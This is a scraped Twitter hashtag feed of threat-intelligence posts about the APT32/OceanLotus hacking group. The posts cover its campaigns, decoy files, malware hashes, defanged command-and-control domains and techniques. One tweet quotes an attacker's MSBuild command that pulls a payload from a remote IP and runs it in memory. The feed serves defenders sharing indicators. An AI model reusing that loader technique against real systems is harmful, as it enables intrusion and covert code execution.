-
#APT32
has to brief metrics like any other government program. Using sales tracking software, their numbers can show what % breached each target is.
NOTE: APT32 uses trial accounts for several sales trackers that also allow for legit cloud hosting of their payloads!

-
Moral of the story is - opening an email in certain mail clients can leak information about your system b/c your mail client autoloads a tracking pixel. And although it might be a company hosting a hot
@RSAConference party - it could also be someone less "friendly"#DFIR#APT32 pic.twitter.com/sjFhhQOJTK
Prikaži ovu nit -
Further reading on Vietnamese threat actor
#APT32
leveraging EPO's software deployment pulls to ship Cobalt Strike #BEACON enterprise-wide: https://twitter.com/ItsReallyNick/status/915903579042566144?s=20 …








I still think asset management abuse needs a fun name. How about "living off the landlord?" -
Interesting tidbit from report. “The attacker utilized the anti-virus management console service account to distribute the malware across the network.” Sounds similar to
#APT32 deploying Cobalt Strike via McAfee EPO server@ItsReallyNick & I discussed recently on#StateOfTheHackhttps://twitter.com/campuscodi/status/1215128139271147520 …
-
#OceanLotus (#APT32) campaign spreading via FB. Post or DM contains link to a malicious archive hosted on Dropbox. First stage is executed upon opening the decoy “document” seemingly related to Vietnam. Beacons to opengroup.homeunix[.]org via HTTPS.@marc_etienne_#ESETresearchpic.twitter.com/7CKXhe2b4m
-
For the U.S. crowd, just waking up: BMW was hacked by
#APT32. The carmaker decided to monitor the intruders for months to better understand their goals. No sensitive data is said to be stolen. Also, Hyundai was targeted in the same campaign. https://www.tagesschau.de/investigativ/br-recherche/bmw-hacker-101.html … (in german) -
Exklusiv: Eine Hackergruppe, die mutmaßlich im Auftrag des Staates Vietnam agiert, hat deutsche Automobilkonzerne im Visier. Ihnen ist es gelungen, in die Netzwerke von BMW einzudringen. BMW hat die Hacker über Monate beobachtet. https://www.tagesschau.de/investigativ/br-recherche/bmw-hacker-101.html …
#OceanLotus#APT32Prikaži ovu nit -
Stopped using PowerShell for attacks? Seems to be working just fine for
#APT32
lang.ps1 uploaded yesterday (3/56): https://www.virustotal.com/gui/file/f5e742f8eb37bdc44712c04331b55576d776fa5c1bf15fed9ec270e15c21b749/detection …
I appreciate their signature obfuscation style (pictured)
The underlying backdoor here is very creative... [1/2]pic.twitter.com/53SCaV6m0v
Prikaži ovu nit -
DLL side-loading seems utilized by the
#APT32#OceanLotus group to deliver malware generated by#Cobalt Strike URL:hxxps://cdn.redirectme.net/JbJf File name:Noi dung chi tiet thu moi tham du hoi nghi va lich trinh dien ra hoi nghi tai thu do Paris Phap https://sandbox.ti.qianxin.com/sandbox/page/detail?type=file&sha1=621ea1ccdff21b0c104280673e91a23ad5e492d3 …pic.twitter.com/JzRdglXHLd
-
#APT32#OceanLotus New test sample seems crafted by the#OceanLotus APT group. Malicious payload is dropped to the startup folder through#WinRAR exploit (#CVE-2018-20250), meanwhile a resume gets displayed to confuse the victim. https://www.virustotal.com/gui/file/4ae7a9d63870c82138a38159b5364f84188a06dc5325f99ef36149cc5ff5e48a …pic.twitter.com/rH2YQUbTwo
-
#APT32 targets on Vietnamese human right organization SHA1: c159e6489ca0b516017b7468013084a8fc422870 File name: "Danh sach cac ca nhan to chuc tai Hai ngoai va quoc noi ung ho cac tu nhan luong tam bi buc hai.exe"Prikaži ovu nit -
#APT32#OceanLotus Decoy document containing the map of Spratly Islands seems used by the#OceanLotus APT group. Similar DLL Side-Loading approach is utilized to carry out related attacks. https://www.virustotal.com/gui/file/c0804ba6eae469c2753e0ef23bb0d0ba953702be8426aa209eac5d6b89d7f886/detection …pic.twitter.com/HtCdrJg8zJ
-
#APT#APT32#OCEANLOTUS#SectorF01 may be#Korplug cluster ref.@nshcthreatrecon repo of 25/07 md5:05b5707d79ca0aee269eb1b02db75b19 -
#APT32 The SFX archive drop and execute a lure (docx file) for decoy the victim and the dll file (pkg file) for loader the Quasar RAT with the bin file. Its have for the role to reorganize the final PE. pic.twitter.com/CnYhky5Kmw
Prikaži ovu nit -
#APT32 c7eead9b2a622dd7f14f2ddb9bcd4ea3c4cf3a7dddc30283a057482c4ed6a93e WN: ប្រកាសតែងតាំងមុខតំណែង_docx.exe C2: get[.]freelicenses[.]net https://s.threatbook.cn/report/file/c7eead9b2a622dd7f14f2ddb9bcd4ea3c4cf3a7dddc30283a057482c4ed6a93e/?sign=history&env=win7_sp1_enx86_office2013 …pic.twitter.com/hTMGqeP2re
-
#APT32 phishing - now with more#TweeTPs Windows.csproj & .mp4 downloaded with certutil MSBuild.exe %TEMP%\Windows.csproj /p:AssemblyName=%TEMP%\Windows.mp4 /p:ScriptFile=hxxp://139.59.30[.]109:8090/abcv /p:Key="WindowsService" Payload loaded in memory then deleted from diskhttps://twitter.com/RedDrip7/status/1130780807318999040 …
Prikaži ovu nit -
#APT#Ocealotus#APT32 d53779393984053ec239ec16adc272d7 Embedding Base64 string in Content pic.twitter.com/ZAvMb4moVA
-
#APT32 something new about Apt32.... https://pastebin.com/sRzfwfsa@Manu_De_Lucia@JAMESWT_MHT@malwrhunterteam@JAMESWT_MHT@DrunkBinary@JRoosen@DissectMalware@malware_traffic@VK_Intel -
#OceanLotus/#APT32 is back with a new watering hole campaign. Many compromised websites including 2 Cambodian ministries (Ministry of Foreign Affairs and Ministry of Defence). Blog: https://www.welivesecurity.com/2018/11/20/oceanlotus-new-watering-hole-attack-southeast-asia/ …@MISP event: https://github.com/eset/malware-ioc/tree/master/oceanlotus …pic.twitter.com/CHk0AvpwbE
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.